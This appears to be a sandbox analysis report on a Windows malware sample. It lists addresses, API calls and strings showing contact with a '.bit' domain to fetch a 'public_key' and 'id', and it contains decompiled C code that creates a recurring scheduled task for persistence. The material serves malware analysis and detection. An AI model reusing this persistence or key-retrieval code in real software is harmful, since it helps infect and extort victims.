0x0041e6ba
0x0041e6bc
0x0041e6c7
0x0041e6cc
0x0041e6d4
0x0041e6d8
0x0041e6e0
0x0041e6e0
0x0041e6f0
0x0041e6f0
0x0041e6f0
0x0041e6f0
0x0041e6fc
0x0041e707
0x0041e70c
0x0041e70f
0x0041e722
0x00000000
0x0041e724
0x0041e724
0x0041e724
0x0041ea1f
0x0041ea26
0x0041ea34
0x0041ea36
0x0041ea3b
0x0041ea40
0x0041eaa4
0x0041eaba
0x0041eac8
0x0041eaca
0x0041eacc
0x0041eaef
0x0041eaef
0x0041eaf2
0x0041eaf7
0x0041eaf9
0x0041eb00
0x0041eb07
0x0041eb0a
0x0041eb12
0x0041eb18
0x0041eb1f
0x0041eb1f
0x0041eb22
0x0041eb22
0x0041eb24
0x0041eb25
0x0041eb25
0x0041eb29
0x0041eb29
0x0041eb2b
0x0041eb2b
0x0041eb36
0x0041eb3b
0x0041eb43
0x0041eb48
0x0041eb4b
0x0041eb4f
0x0041eb51
0x0041eb51
0x0041eb54
0x0041eb5b
0x0041eb61
0x0041eb66
0x0041eb6c
0x0041eb71
0x0041eb71
0x0041eb7e
0x0041eb8e
0x0041eb94
0x0041eb9c
0x0041ebae
0x0041ebb6
0x0041ebc0
0x0041ebca
0x0041ebda
0x0041ebdf
0x0041ebe2
0x0041ebe4
0x0041ec3e
0x0041ec44
0x0041ec6d
0x0041ec7f
0x0041ec88
0x0041ec91
0x0041ec93
0x0041ec95
0x0041ec97
0x0041ecbf
0x0041ecbf
0x0041ecc4
0x0041ecc6
0x0041eccd
0x0041ecd4
0x0041ecd6
0x0041ecdd
0x0041ece3
0x0041ecea
0x0041ecf0
0x0041ecf0
0x0041ecf2
0x0041ecf3
0x0041ecf3
0x0041ecf7
0x0041ecf7
0x0041ecf9
0x0041ecf9
0x0041ed04
0x0041ed09
0x0041ed0f
0x0041ed14
0x0041ed17
0x0041ed1b
0x0041ed1d
0x0041ed1d
0x0041ed23
0x0041ed2a
0x0041ed30
0x0041ed35
0x0041ed3b
0x0041ed40
0x0041ed40
0x0041ed4d
0x0041ed5d
0x0041ed63
0x0041ed68
0x0041ed7d
0x0041ed85
0x0041ed8b
0x0041ed94
0x0041ed9b
0x0041eda3
0x0041eda9
0x0041edab
0x0041edbc
0x0041edbc
0x0041edc1
0x0041ee10
0x0041ee12
0x0041ee15
0x0041ee1a
0x0041ee1a
0x0041ee1d
0x0041ee1f
0x0041ee22
0x0041ee27
0x0041ee27
0x00000000
0x0041ee1f
0x00000000
0x0041edad
0x0041edae
0x0041edb4
0x0041edb6
0x0041ee44
0x00000000
0x0041ee44
0x00000000
0x0041edb6
0x0041edab
0x0041ecdf
0x00000000
0x0041ecdf
0x0041eca0
0x0041eca0
0x0041eca8
0x00000000
0x00000000
0x0041ecb1
0x0041ecb3
0x0041ecb5
0x0041ecb7
0x00000000
0x00000000
0x00000000
0x0041ecb9
0x0041ecbb
0x00000000
0x0041ebe6
0x0041ebe6
0x0041ebea
0x0041ee2a
0x0041ee2a
0x0041ee33
0x0041ee34
0x0041ee38
0x0041ee3a
0x0041ee58
0x0041ee5d
0x0041ee60
0x0041ee68
0x0041ee70
0x0041ee75
0x0041ee80
0x0041ee80
0x0041ee82
0x0041ee86
0x0041ee86
0x0041ee89
0x0041ee8c
0x0041ee92
0x0041ee94
0x0041ee97
0x0041ee97
0x0041ee99
0x0041ee9a
0x0041ee9a
0x0041ee9e
0x0041ee9e
0x00000000
0x0041ee9e
0x0041ee8e
0x0041eea0
0x0041eea0
0x0041eea6
0x0041eeab
0x0041eeac
0x0041eeac
0x0041eebc
0x0041eec1
0x0041eec4
0x0041eecc
0x0041eed4
0x0041eed9
0x0041eee1
0x0041eee1
0x0041eee3
0x0041eee7
0x0041eee7
0x0041eeea
0x0041eeed
0x0041eef3
0x0041eef5
0x0041eef8
0x0041eef8
0x0041eefa
0x0041eefb
0x0041eefb
0x0041eeff
0x0041eeff
0x00000000
0x0041eeff
0x0041eeef
0x0041ef01
0x0041ef01
0x0041ef07
0x0041ef0c
0x0041ef0d
0x0041ef0d
0x0041ef12
0x0041ef1c
0x0041ef20
0x0041ef24
0x0041ef2b
0x0041ef33
0x0041ef35
0x0041ef40
0x0041ef45
0x0041ef48
0x0041ef4c
0x0041ef4e
0x0041ef4e
0x0041ef50
0x0041ef61
0x0041ef63
0x0041ef68
0x0041ef6e
0x0041ef73
0x0041ef73
0x0041ef76
0x0041ef79
0x0041ef7e
0x0041ef84
0x0041ef88
0x0041ef8f
0x0041ef97
0x0041ef9a
0x0041efa7
0x0041efac
0x0041efaf
0x0041efb3
0x0041efb5
0x0041efb5
0x0041efbf
0x0041efc1
0x0041efc6
0x0041efcc
0x0041efd1
0x0041efd1
0x0041efd4
0x0041efd9
0x0041efe0
0x0041efe6
0x0041efeb
0x0041efeb
0x0041efee
0x0041eff3
0x0041effb
0x0041f003
0x0041f008
0x0041f00e
0x0041f013
0x0041f016
0x0041f01a
0x0041f021
0x0041f025
0x0041f030
0x0041f030
0x0041ee3c
0x0041e6e0
0x0041e6e0
0x0041e6f0
0x0041e6fc
0x0041e707
0x0041e70c
0x0041e70f
0x0041e722
0x00000000
0x0041e724
0x0041e724
0x0041e724
0x0041e722
0x0041e6e0
0x00000000
0x0041ebea
0x0041ebe4
0x0041eb14
0x00000000
0x0041eb14
0x0041ead0
0x0041ead0
0x0041ead8
0x00000000
0x00000000
0x0041eae1
0x0041eae3
0x0041eae5
0x0041eae7
0x00000000
0x00000000
0x00000000
0x0041eae9
0x0041eaeb
0x00000000
0x0041eaeb
0x0041ea46
0x00000000
0x00000000
0x0041ea4c
0x0041ea59
0x0041ea61
0x0041ea74
0x0041ea82
0x0041ea82
0x00000000
0x0041e72e
0x0041e73b
0x0041e749
0x0041e74b
0x0041e755
0x0041e75d
0x0041e762
0x0041e765
0x0041e768
0x0041e76f
0x0041e772
0x0041e778
0x0041e77a
0x0041e77a
0x0041e780
0x0041e780
0x0041e783
0x0041e786
0x0041e789
0x00000000
0x0041e78b
0x0041e78b
0x0041e78b
0x0041e78d
0x00000000
0x0041e78d
0x0041e774
0x0041e774
0x0041e78f
0x0041e78f
0x0041e795
0x0041e79a
0x0041e7a3
0x0041e7a8
0x0041e7ad
0x0041e7ae
0x0041e7b3
0x0041e7b6
0x0041e7b8
0x0041e7be
0x0041e7c3
0x0041e7c5
0x0041e7c7
0x0041e7ce
0x0041e7d6
0x0041e7de
0x0041e7ec
0x0041e7ee
0x0041e7f5
0x0041e7f7
0x0041e80e
0x0041e816
0x0041e81e
0x0041e823
0x0041e827
0x0041e844
0x0041e848
0x0041e829
0x0041e82c
0x0041e82c
0x0041e82d
0x0041e838
0x0041e83d
0x0041e83d
0x0041e82d
0x0041e851
0x0041e858
0x0041e85c
0x0041e85e
0x0041e865
0x0041e86c
0x0041e86c
0x0041e86f
0x0041e874
0x0041e87a
0x0041e87f
0x0041e87f
0x0041e874
0x0041e882
0x0041e88d
0x0041e892
0x0041e895
0x0041e89a
0x0041e89f
0x0041e8a3
0x0041e8aa
0x0041e8b2
0x0041e8b5
0x0041e8ba
0x0041e8c2
0x0041e8c7
0x0041e8ca
0x0041e8cc
0x0041e8d3
0x0041e8db
0x0041e8e0
0x0041e8e5
0x0041e8eb
0x0041e8f0
0x0041e8f0
0x0041e8f3
0x0041e8fc
0x0041e90a
0x0041e910
0x0041e917
0x0041e919
0x0041e920
0x0041e922
0x0041e927
0x0041e92e
0x0041e937
0x0041e930
0x0041e930
0x0041e930
0x0041e93d
0x0041e93d
0x0041e920
0x0041e95a
0x0041e96f
0x0041e975
0x0041e97a
0x0041e97c
0x0041e98c
0x0041e992
0x0041e994
0x0041e9a3
0x0041e9bb
0x0041e9bd
0x0041e9c0
0x0041e9c2
0x0041e9c4
0x0041e9d3
0x0041e9db
0x0041e9dd
0x0041e9de
0x0041e9e3
0x0041e9e4
0x0041e9e9
0x0041e9e9
0x0041e9c2
0x0041e994
0x0041e9f3
0x0041e9f6
0x0041e9f8
0x0041ea03
0x0041ea08
0x0041ea0e
0x0041ea13
0x0041ea13
0x0041ea16
0x0041ea19
0x00000000
0x0041ea19
0x0041e772
0x0041ebf0
0x0041ec00
0x0041ec06
0x0041ec0c
0x0041ec0f
0x0041ec0f
0x0041ec24
0x0041ec32
0x0041e6e0
0x0041e6e0
0x00000000
0x0041e6e6
0x0041edc3
0x0041edc3
0x0041edd3
0x0041edd9
0x0041eddf
0x0041ede2
0x0041ede2
0x0041edf7
0x0041ee05
0x0041ee05

APIs

timeGetTime.WINMM ref: 0041E6C0

Part of subcall function 0040C6A0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
Part of subcall function 0040C6A0: RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
Part of subcall function 0040C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0040C700

_memset.LIBCMT ref: 0041E707

Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B

InternetOpenW.WININET ref: 0041E743
_wcsstr.LIBCMT ref: 0041E7AE
_memmove.LIBCMT ref: 0041E838
lstrcpyW.KERNEL32 ref: 0041E90A
lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
InternetCloseHandle.WININET(00000000), ref: 0041E9F3
InternetCloseHandle.WININET(00000000), ref: 0041E9F6
_strstr.LIBCMT ref: 0041EA36
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
DeleteFileA.KERNEL32(?), ref: 0041EA82
lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
lstrcpyA.KERNEL32(?,?), ref: 0041EABA
lstrlenA.KERNEL32(?), ref: 0041EAC8
lstrlenA.KERNEL32(00000022), ref: 0041EAE3
lstrcpyW.KERNEL32 ref: 0041EB5B
lstrlenA.KERNEL32(?), ref: 0041EB7C
_malloc.LIBCMT ref: 0041EB86
_memset.LIBCMT ref: 0041EB94
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
lstrcpyW.KERNEL32 ref: 0041EBB6
_strstr.LIBCMT ref: 0041EBDA
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
DeleteFileA.KERNEL32(?), ref: 0041EC32
lstrlenW.KERNEL32(?), ref: 0041EC3E
lstrlenA.KERNEL32(","id":"), ref: 0041EC51
lstrcpyA.KERNEL32(?,?), ref: 0041EC6D
lstrcpyA.KERNEL32(?,?), ref: 0041EC7F
lstrlenA.KERNEL32(?), ref: 0041EC93
lstrlenA.KERNEL32(00000022), ref: 0041ECB3
lstrcpyW.KERNEL32 ref: 0041ED2A
lstrlenA.KERNEL32(?), ref: 0041ED4B
_malloc.LIBCMT ref: 0041ED55
_memset.LIBCMT ref: 0041ED63
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0041ED7D
lstrcpyW.KERNEL32 ref: 0041ED85
lstrlenW.KERNEL32(?), ref: 0041EDA3
lstrlenW.KERNEL32(?), ref: 0041EDAE
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EDD3
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EDF7
DeleteFileA.KERNEL32(?), ref: 0041EE05
_free.LIBCMT ref: 0041EE15
_free.LIBCMT ref: 0041EE22
lstrcpyW.KERNEL32 ref: 0041EF61
lstrcpyW.KERNEL32 ref: 0041EFBF

Strings

&first=true, xrefs: 0041E930
Microsoft Internet Explorer, xrefs: 0041E736
bowsakkdestx.txt, xrefs: 0041E996, 0041EA67, 0041EC17, 0041EDEA
{"public_key":", xrefs: 0041EA2E, 0041EA8D
&first=false, xrefs: 0041E937
.bit/, xrefs: 0041E7A3
","id":", xrefs: 0041EBC5, 0041EC4C
?pid=, xrefs: 0041E884
", xrefs: 0041ECA0

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
API String ID: 704684250-3586605218
Opcode ID: ab0c2a3771126956d15e600cc244ccaba4167f4cf519e74898ab1ace71ecfc18
Instruction ID: 6dbc96f3ccd93c00a013485041b5c7257b0a9ae09bebbc57280f72cccf7ce4d8
Opcode Fuzzy Hash: ab0c2a3771126956d15e600cc244ccaba4167f4cf519e74898ab1ace71ecfc18
Instruction Fuzzy Hash: FA421771508341ABD720DF25DC45BDB7BE8BF85308F44092EF88587292DB78E589CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D240 Relevance: 56.7, APIs: 24, Strings: 8, Instructions: 702
comCOMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E0040D240(void* __ecx, char _a4, intOrPtr _a24) {
				char _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				char _v28;
				void* _v32;
				char _v33;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				char _v92;
				void* _v96;
				char _v100;
				char _v104;
				short _v120;
				char _v140;
				char _v156;
				char _v172;
				char _v228;
				char _v244;
				char _v324;
				long _v1348;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t222;
				short _t226;
				short _t243;
				intOrPtr* _t248;
				intOrPtr* _t249;
				intOrPtr* _t250;
				short _t251;
				intOrPtr* _t253;
				intOrPtr* _t254;
				intOrPtr* _t255;
				intOrPtr* _t258;
				short _t259;
				intOrPtr* _t261;
				intOrPtr* _t263;
				intOrPtr* _t265;
				intOrPtr* _t267;
				intOrPtr* _t268;
				intOrPtr* _t269;
				short _t270;
				intOrPtr* _t273;
				short _t274;
				intOrPtr* _t275;
				short _t276;
				intOrPtr* _t278;
				short _t279;
				intOrPtr* _t280;
				short _t281;
				intOrPtr* _t283;
				intOrPtr* _t285;
				intOrPtr* _t286;
				intOrPtr* _t287;
				short _t288;
				intOrPtr* _t291;
				short _t292;
				intOrPtr* _t293;
				short _t294;
				intOrPtr* _t296;
				short _t297;
				intOrPtr* _t299;
				intOrPtr* _t301;
				intOrPtr* _t302;
				intOrPtr* _t303;
				short _t304;
				intOrPtr* _t306;
				intOrPtr* _t307;
				intOrPtr* _t308;
				short _t309;
				intOrPtr* _t311;
				intOrPtr* _t313;
				intOrPtr* _t314;
				intOrPtr* _t315;
				short _t316;
				intOrPtr* _t318;
				intOrPtr* _t319;
				intOrPtr* _t320;
				short _t321;
				intOrPtr* _t332;
				intOrPtr* _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				short _t336;
				intOrPtr* _t340;
				short _t341;
				intOrPtr* _t342;
				short _t343;
				intOrPtr* _t345;
				short _t346;
				intOrPtr* _t350;
				intOrPtr* _t351;
				short _t352;
				intOrPtr* _t354;
				intOrPtr* _t355;
				intOrPtr* _t356;
				short _t357;
				intOrPtr* _t365;
				intOrPtr* _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				intOrPtr* _t386;
				intOrPtr* _t388;
				intOrPtr* _t390;
				intOrPtr* _t392;
				void* _t394;
				char _t395;
				intOrPtr* _t397;
				intOrPtr* _t398;
				intOrPtr* _t402;
				intOrPtr* _t410;
				intOrPtr* _t417;
				intOrPtr* _t420;
				intOrPtr* _t423;
				intOrPtr* _t428;
				intOrPtr* _t431;
				intOrPtr* _t433;
				intOrPtr* _t454;
				intOrPtr* _t457;
				intOrPtr* _t459;
				intOrPtr* _t466;
				intOrPtr* _t469;
				short _t479;
				short _t480;
				short _t484;
				short _t491;
				short _t499;
				short _t500;
				short _t501;
				short _t502;
				short _t504;
				intOrPtr* _t511;
				short _t512;
				short _t513;
				void* _t516;
				void* _t517;
				void* _t519;
				intOrPtr* _t540;
				short _t541;
				short _t542;
				intOrPtr _t543;
				void* _t544;

				_t222 =  *[fs:0x0];
				 *[fs:0x0] = _t543;
				_t544 = _t543 - 0x538;
				_t517 = __ecx;
				_v8 = 0;
				__imp__CoInitialize(0, _t516, _t519, _t394, _t222, 0x4ca928, 0xffffffff);
				if(_t222 >= 0) {
					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0);
					_v100 = 7;
					_v120 = 0;
					_v104 = 0;
					E00414690(_t394,  &_v120,  &_a4, 0);
					_t226 =  &_v32;
					_v8 = 1;
					_v32 = 0;
					__imp__CoCreateInstance(0x4d506c, 0, 1, 0x4d4fec, _t226, 0xffffffff);
					__eflags = _t226;
					if(_t226 < 0) {
						L74:
						__imp__CoUninitialize();
						_t395 = 0;
					} else {
						_t397 = __imp__#8;
						 *_t397( &_v156);
						asm("movdqu xmm0, [ebp-0x98]");
						asm("movdqu [ebp-0xb8], xmm0");
						 *_t397( &_v140);
						asm("movdqu xmm0, [ebp-0x88]");
						asm("movdqu [ebp-0xc8], xmm0");
						 *_t397( &_v172);
						asm("movdqu xmm0, [ebp-0xa8]");
						asm("movdqu [ebp-0xd8], xmm0");
						 *_t397( &_v244);
						_v8 = 5;
						asm("movdqu xmm0, [ebp-0xb8]");
						_t402 = _v32;
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xc8]");
						asm("movdqu [eax], xmm0");
						_t544 = _t544 - 0xffffffffffffffe0;
						asm("movdqu xmm0, [ebp-0xd8]");
						asm("movdqu [eax], xmm0");
						asm("movdqu xmm0, [ebp-0xf0]");
						asm("movdqu [eax], xmm0");
						_t243 =  *((intOrPtr*)( *_t402 + 0x28))(_t402);
						__imp__#9( &_v244);
						__imp__#9( &_v172);
						__imp__#9( &_v140);
						_v8 = 1;
						__imp__#9( &_v156);
						__eflags = _t243;
						if(__eflags >= 0) {
							_v24 = 0;
							_t248 = E0040B140(_t397,  &_v28, __eflags, "\\");
							_v8 = 6;
							_t249 =  *_t248;
							__eflags = _t249;
							if(_t249 == 0) {
								_t479 = 0;
								__eflags = 0;
							} else {
								_t479 =  *_t249;
							}
							_t250 = _v32;
							_t251 =  *((intOrPtr*)( *_t250 + 0x1c))(_t250, _t479,  &_v24);
							_v8 = 1;
							E0040B1D0( &_v28, _t479);
							__eflags = _t251;
							if(__eflags >= 0) {
								_t253 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
								_v8 = 7;
								_t254 =  *_t253;
								__eflags = _t254;
								if(_t254 == 0) {
									_t480 = 0;
									__eflags = 0;
								} else {
									_t480 =  *_t254;
								}
								_t255 = _v24;
								 *((intOrPtr*)( *_t255 + 0x3c))(_t255, _t480, 0);
								_v8 = 1;
								E0040B1D0( &_v28, _t480);
								_t258 = _v32;
								_v20 = 0;
								_t259 =  *((intOrPtr*)( *_t258 + 0x24))(_t258, 0,  &_v20);
								_t410 = _v32;
								 *((intOrPtr*)( *_t410 + 8))(_t410);
								__eflags = _t259;
								if(_t259 >= 0) {
									_t261 = _v20;
									_v64 = 0;
									__eflags =  *((intOrPtr*)( *_t261 + 0x1c))(_t261,  &_v64);
									if(__eflags < 0) {
										L73:
										_t263 = _v24;
										 *((intOrPtr*)( *_t263 + 8))(_t263);
										_t265 = _v20;
										 *((intOrPtr*)( *_t265 + 8))(_t265);
										goto L74;
									} else {
										_t267 = E0040B140(_t397,  &_v28, __eflags, L"Author Name");
										_v8 = 8;
										_t268 =  *_t267;
										__eflags = _t268;
										if(_t268 == 0) {
											_t484 = 0;
											__eflags = 0;
										} else {
											_t484 =  *_t268;
										}
										_t269 = _v64;
										_t270 =  *((intOrPtr*)( *_t269 + 0x28))(_t269, _t484);
										_v8 = 1;
										E0040B1D0( &_v28, _t484);
										_t417 = _v64;
										 *((intOrPtr*)( *_t417 + 8))(_t417);
										__eflags = _t270;
										if(_t270 < 0) {
											goto L73;
										} else {
											_t273 = _v20;
											_v56 = 0;
											_t274 =  *((intOrPtr*)( *_t273 + 0x3c))(_t273,  &_v56);
											__eflags = _t274;
											if(_t274 < 0) {
												goto L73;
											} else {
												_t275 = _v56;
												_t276 =  *((intOrPtr*)( *_t275 + 0x38))(_t275, 3);
												_t420 = _v56;
												 *((intOrPtr*)( *_t420 + 8))(_t420);
												__eflags = _t276;
												if(_t276 < 0) {
													goto L73;
												} else {
													_t278 = _v20;
													_v48 = 0;
													_t279 =  *((intOrPtr*)( *_t278 + 0x2c))(_t278,  &_v48);
													__eflags = _t279;
													if(_t279 < 0) {
														goto L73;
													} else {
														_t280 = _v48;
														_t281 =  *((intOrPtr*)( *_t280 + 0x58))(_t280, 0xffffffff);
														_t423 = _v48;
														 *((intOrPtr*)( *_t423 + 8))(_t423);
														__eflags = _t281;
														if(_t281 < 0) {
															goto L73;
														} else {
															_t283 = _v48;
															_v76 = 0;
															__eflags =  *((intOrPtr*)( *_t283 + 0x9c))(_t283,  &_v76);
															if(__eflags < 0) {
																goto L73;
															} else {
																_t285 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																_v8 = 9;
																_t286 =  *_t285;
																__eflags = _t286;
																if(_t286 == 0) {
																	_t491 = 0;
																	__eflags = 0;
																} else {
																	_t491 =  *_t286;
																}
																_t287 = _v76;
																_t288 =  *((intOrPtr*)( *_t287 + 0x28))(_t287, _t491);
																_v8 = 1;
																E0040B1D0( &_v28, _t491);
																_t428 = _v76;
																 *((intOrPtr*)( *_t428 + 8))(_t428);
																__eflags = _t288;
																if(_t288 < 0) {
																	goto L73;
																} else {
																	_t291 = _v20;
																	_v80 = 0;
																	_t292 =  *((intOrPtr*)( *_t291 + 0x24))(_t291,  &_v80);
																	__eflags = _t292;
																	if(_t292 < 0) {
																		goto L73;
																	} else {
																		_t293 = _v80;
																		_v68 = 0;
																		_t294 =  *((intOrPtr*)( *_t293 + 0x28))(_t293, 1,  &_v68);
																		_t431 = _v80;
																		 *((intOrPtr*)( *_t431 + 8))(_t431);
																		__eflags = _t294;
																		if(_t294 < 0) {
																			goto L73;
																		} else {
																			_t296 = _v68;
																			_v40 = 0;
																			_t297 =  *((intOrPtr*)( *_t296))(_t296, 0x4d50ec,  &_v40);
																			_t433 = _v68;
																			 *((intOrPtr*)( *_t433 + 8))(_t433);
																			__eflags = _t297;
																			if(_t297 < 0) {
																				goto L73;
																			} else {
																				_t299 = _v40;
																				__eflags =  *((intOrPtr*)( *_t299 + 0x28))(_t299,  &_v60);
																				if(__eflags < 0) {
																					goto L73;
																				} else {
																					_t301 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																					_v8 = 0xa;
																					_t302 =  *_t301;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						_t499 = 0;
																						__eflags = 0;
																					} else {
																						_t499 =  *_t302;
																					}
																					_t303 = _v60;
																					_t304 =  *((intOrPtr*)( *_t303 + 0x20))(_t303, _t499);
																					_v8 = 1;
																					E0040B1D0( &_v28, _t499);
																					__eflags = _t304;
																					if(__eflags < 0) {
																						goto L73;
																					} else {
																						_t306 = E0040B140(_t397,  &_v28, __eflags, 0x500078);
																						_v8 = 0xb;
																						_t307 =  *_t306;
																						__eflags = _t307;
																						if(_t307 == 0) {
																							_t500 = 0;
																							__eflags = 0;
																						} else {
																							_t500 =  *_t307;
																						}
																						_t308 = _v60;
																						_t309 =  *((intOrPtr*)( *_t308 + 0x28))(_t308, _t500);
																						_v8 = 1;
																						E0040B1D0( &_v28, _t500);
																						__eflags = _t309;
																						if(_t309 < 0) {
																							goto L73;
																						} else {
																							_t311 = _v40;
																							__eflags =  *((intOrPtr*)( *_t311 + 0x2c))(_t311, _v60);
																							if(__eflags < 0) {
																								goto L73;
																							} else {
																								_t313 = E0040B140(_t397,  &_v28, __eflags, L"Trigger1");
																								_v8 = 0xc;
																								_t314 =  *_t313;
																								__eflags = _t314;
																								if(_t314 == 0) {
																									_t501 = 0;
																									__eflags = 0;
																								} else {
																									_t501 =  *_t314;
																								}
																								_t315 = _v40;
																								_t316 =  *((intOrPtr*)( *_t315 + 0x24))(_t315, _t501);
																								_v8 = 1;
																								E0040B1D0( &_v28, _t501);
																								__eflags = _t316;
																								if(__eflags < 0) {
																									goto L73;
																								} else {
																									_t318 = E0040B140(_t397,  &_v28, __eflags, L"2030-05-02T08:00:00");
																									_v8 = 0xd;
																									_t319 =  *_t318;
																									__eflags = _t319;
																									if(_t319 == 0) {
																										_t502 = 0;
																										__eflags = 0;
																									} else {
																										_t502 =  *_t319;
																									}
																									_t320 = _v40;
																									_t321 =  *((intOrPtr*)( *_t320 + 0x44))(_t320, _t502);
																									_v8 = 1;
																									E0040B1D0( &_v28, _t502);
																									__eflags = _t321;
																									if(__eflags < 0) {
																										goto L73;
																									} else {
																										E00423AAF( &_v28, _t502, __eflags,  &_v92);
																										asm("cdq");
																										_v92 = _v92 + _t517;
																										asm("adc [ebp-0x54], edx");
																										E004228E0( &_v324, 0x50, "%Y-%m-%dT%H:%M:%S", E00423551( &_v92));
																										_v33 = 0;
																										E00412C40(_t544, _t517,  &_v324);
																										_t332 = E00412900( &_v228, _v33);
																										_t544 = _t544 + 0x18;
																										_v8 = 0xe;
																										__eflags =  *((intOrPtr*)(_t332 + 0x14)) - 8;
																										if(__eflags >= 0) {
																											_t332 =  *_t332;
																										}
																										_t333 = E0040B140(_t397,  &_v28, __eflags, _t332);
																										_v8 = 0xf;
																										_t334 =  *_t333;
																										__eflags = _t334;
																										if(_t334 == 0) {
																											_t504 = 0;
																											__eflags = 0;
																										} else {
																											_t504 =  *_t334;
																										}
																										_t335 = _v40;
																										_t336 =  *((intOrPtr*)( *_t335 + 0x3c))(_t335, _t504);
																										E0040B1D0( &_v28, _t504);
																										_v8 = 1;
																										E00413210( &_v228);
																										_t454 = _v40;
																										 *((intOrPtr*)( *_t454 + 8))(_t454);
																										__eflags = _t336;
																										if(_t336 < 0) {
																											goto L73;
																										} else {
																											_t340 = _v20;
																											_v52 = 0;
																											_t341 =  *((intOrPtr*)( *_t340 + 0x44))(_t340,  &_v52);
																											__eflags = _t341;
																											if(_t341 < 0) {
																												goto L73;
																											} else {
																												_t342 = _v52;
																												_v72 = 0;
																												_t343 =  *((intOrPtr*)( *_t342 + 0x30))(_t342, 0,  &_v72);
																												_t457 = _v52;
																												 *((intOrPtr*)( *_t457 + 8))(_t457);
																												__eflags = _t343;
																												if(_t343 < 0) {
																													goto L73;
																												} else {
																													_t345 = _v72;
																													_v44 = 0;
																													_t346 =  *((intOrPtr*)( *_t345))(_t345, 0x4d511c,  &_v44);
																													_t459 = _v72;
																													 *((intOrPtr*)( *_t459 + 8))(_t459);
																													__eflags = _t346;
																													if(_t346 < 0) {
																														goto L73;
																													} else {
																														__eflags = _v100 - 8;
																														_t349 =  >=  ? _v120 :  &_v120;
																														_t350 = E0040B140(_t397,  &_v28, _v100 - 8,  >=  ? _v120 :  &_v120);
																														_v8 = 0x10;
																														_t511 =  *_t350;
																														__eflags = _t511;
																														if(_t511 == 0) {
																															_t512 = 0;
																															__eflags = 0;
																														} else {
																															_t512 =  *_t511;
																														}
																														_t351 = _v44;
																														_t352 =  *((intOrPtr*)( *_t351 + 0x2c))(_t351, _t512);
																														_v8 = 1;
																														E0040B1D0( &_v28, _t512);
																														__eflags = _t352;
																														if(__eflags >= 0) {
																															_t354 = E0040B140(_t397,  &_v28, __eflags, L"--Task");
																															_v8 = 0x11;
																															_t355 =  *_t354;
																															__eflags = _t355;
																															if(_t355 == 0) {
																																_t513 = 0;
																																__eflags = 0;
																															} else {
																																_t513 =  *_t355;
																															}
																															_t356 = _v44;
																															_t357 =  *((intOrPtr*)( *_t356 + 0x34))(_t356, _t513);
																															_v8 = 1;
																															_t539 = _t357;
																															E0040B1D0( &_v28, _t513);
																															_t466 = _v44;
																															 *((intOrPtr*)( *_t466 + 8))(_t466);
																															__eflags = _t357;
																															if(_t357 < 0) {
																																goto L73;
																															} else {
																																_v96 = 0;
																																E0040B400( &_v172, _t539, _t466);
																																asm("movdqu xmm0, [eax]");
																																asm("movdqu [ebp-0xd8], xmm0");
																																 *_t397( &_v140);
																																asm("movdqu xmm0, [ebp-0x88]");
																																asm("movdqu [ebp-0xc8], xmm0");
																																 *_t397( &_v156);
																																_v8 = 0x14;
																																asm("movdqu xmm0, [ebp-0x98]");
																																asm("movdqu [ebp-0xb8], xmm0");
																																_t365 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
																																_v8 = 0x15;
																																_t540 =  *_t365;
																																__eflags = _t540;
																																if(_t540 == 0) {
																																	_t541 = 0;
																																	__eflags = 0;
